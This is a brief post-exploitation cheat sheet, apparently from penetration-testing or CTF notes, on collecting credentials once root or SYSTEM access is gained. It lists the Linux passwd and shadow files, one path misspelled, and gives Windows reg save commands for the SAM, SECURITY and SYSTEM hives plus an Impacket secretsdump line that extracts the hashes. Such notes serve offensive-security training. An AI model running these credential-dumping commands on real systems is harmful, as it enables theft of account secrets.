Loot

Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑

Linux

Dump users and passwords

Collect files on target

/etc/passwd
/erc/shadow

Then unshadow and crack them.

Windows

Dump SAM

Collect files on target

reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system

Then crack them using Impackets' secretsdump

secretsdump.py -sam sam -security security -system system LOCAL

Dump NTDS (DC)

By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.

TODO (see /13-misc/impacket.md)